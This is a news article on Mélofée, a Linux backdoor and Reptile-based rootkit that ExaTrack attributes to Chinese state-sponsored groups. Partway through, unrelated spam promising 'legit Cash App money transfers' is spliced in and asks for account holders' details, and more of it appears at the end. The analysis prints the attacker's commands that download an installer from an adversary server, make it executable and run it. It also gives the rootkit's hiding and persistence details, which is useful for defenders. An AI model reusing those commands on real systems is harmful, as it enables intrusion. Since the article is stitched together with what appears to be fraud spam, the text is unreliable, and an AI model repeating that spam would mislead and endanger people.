Mélofée – New Linux Malware Linked to Chinese APT Groups
A new piece of malware targeted at Linux servers has been connected to an unidentified Chinese state-sponsored hacking organization.
ExaTrack, a French cybersecurity company, discovered three examples of the previously reported malicious software in early 2022 and gave it the name Mélofée.
Mélofée implant analysis
We found three samples of this malware family, which we dubbed Mélofée.
Two of these samples included a version number (20220111
, 20220308
), and we assess that the last sample was likely dated from late April or May 2022.
All these samples shared a common code base, but showed a constant development in the following domains:
- evolutions of the communication protocol and the packet format
- change in the encryption of the configuration, using first
RC4
and then a simplexor
- the development of a
SelfForwardServer
functionality - lastly, the inclusion of a kernel mode rootkit in the last sample.
Rootkit
The first sample we found dropped a rootkit based on a modified version of the open source projet Reptile
1.
According to the vermagic
metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64
. The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.
The rootkit hooks the functions fillonedir
, filldir
and filldir64
in order to not display files with names containing intel_audio
or rc.modules
when listing a directory.
Get Legit Cash App Money Transfer Now
What you can achieve with our Cashapp transfer service is unlimited unless you don’t know how to do business or probably spend money.
WHAT DETAILS DO WE NEED FROM YOU TO COMPLETE TRANSACTION?
- Cashtag $name
- Cashapp Email
- Cashapp Account Holder’s Full Name (To help us send with description to the holder)
- Let us know of any specific instructions you will want us to add to your transfer, but if there are none then we will handle it
It also hooks the inet_ioctl
function in order to be able to communicate with its userland part using the ioctl
system call. The kernel rootkit expects the userland component to send a value of 0xe0e0e0e
during the IOCTL call, with 2 commands supported (these two commands being hide
and show
).
The rootkit is loaded both by the installer and server components with a call to the insmod
utility.
Installer
The implant and the rootkit were installed using shell commands downloading both the installer and a custom binary package from an adversary controlled server. This behaviour is similar to the installation process of Winnti Linux rootkits.
wget http://173.209.62[.]186:8765/installer -O /var/tmp/installer
wget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;
chmod +x /var/tmp/installer;
/var/tmp/installer -i /var/tmp/usbd
The installer is also developped in C++
, and takes the binary package as an argument. It then then proceeds to extract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to respectively /etc/intel_audio/intel_audio.ko
and /etc/intel_audio/audio
The installer inserts the kernel rootkit using a call to system("insmod /etc/intel_audio/intel_audio.ko")
, and also install the persistence in the /etc/rc.modules
file.
Writing to this script ensures that both kernel and implant are executed at boot time2.
One of the artifacts is made to unload a kernel-mode rootkit that is built on the Reptile open source project.
“According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64,” the company said in a report. “The rootkit has a limited set of features, mainly installing a hook designed for hiding itself.”
It is claimed that the installer and a unique binary package are downloaded from a remote server by shell instructions that are used to distribute both the implant and the rootkit.
The rootkit and a live server implant module are both extracted by the installer after it receives the binary package as an argument.
The capabilities of Mélofée, which enable it to communicate with a remote server and obtain instructions that permit it to operate on files, create sockets, run a shell, and issue arbitrary commands, are identical to those of other backdoors of its kind.
The malware’s ties to China come from infrastructure overlaps with groups such as APT41 (aka Winnti) and Earth Berberoka (aka GamblingPuppet).
Earth Berberoka is the name given to a state-sponsored actor chiefly targeting gambling websites in China since at least 2020 using multi-platform malware like HelloBot and Pupy RAT.
According to Trend Micro, some samples of the Python-based Pupy RAT have been concealed using the Reptile rootkit.
AlienReverse
Also discovered by ExaTrack is another implant codenamed AlienReverse, which shares code similarities with Mélofée and makes use of publicly-available tools like EarthWorm and socks_proxy.
The firm claimed that the “Mélofée implant family is yet another weapon in the toolbox of Chinese state-sponsored attackers, which show constant innovation and development.”
“Despite being comparatively straightforward, Mélofée’s capabilities could allow adversaries to carry out their attacks covertly. The fact that these implants were not frequently observed indicates that the assailants are probably only using them on high-value targets.
Click Here to Get Legit Cash App Money Transfer
Get $500 Cashapp | Get $750 Cashapp | Get $1k Cashapp | Get $2k Cashapp | Get $5k Cashapp | Get $4k CAshapp